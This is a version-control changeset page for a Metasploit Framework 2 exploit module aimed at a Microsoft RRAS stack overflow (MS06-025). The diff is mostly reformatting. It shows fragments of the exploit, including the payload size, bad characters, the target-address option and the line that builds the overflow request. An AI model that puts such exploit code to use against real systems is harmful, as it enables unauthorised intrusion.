Changeset 3735
- Timestamp:
- 06/28/06 11:34:17 (2 years ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework2/trunk/exploits/rras_ms06_025.pm
r3719 r3735 13 13 14 14 use Pex::DCERPC; 15 use Pex::SMB; 15 16 use Pex::NDR; 16 17 … … 24 25 'Name' => 'Microsoft RRAS MSO6-025 Stack Overflow', 25 26 'Version' => '$Revision: 1.1 $', 26 'Authors' => 27 [27 'Authors' => 28 [ 28 29 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 29 30 'H D Moore <hdm [at] metasploit.com>' 30 ],31 ], 31 32 32 33 'Arch' => ['x86'], … … 35 36 36 37 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 37 'UserOpts' => { 38 'UserOpts' => 39 { 38 40 'RHOST' => [ 1, 'ADDR', 'The target address' ], 39 41 … … 45 47 }, 46 48 47 'Payload' => { 49 'Payload' => 50 { 48 51 'Space' => 1104, 49 52 'BadChars' => "\x00", … … 177 180 } 178 181 179 # need to produce an exception182 # We need to produce an exception 180 183 my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern)); 181 184
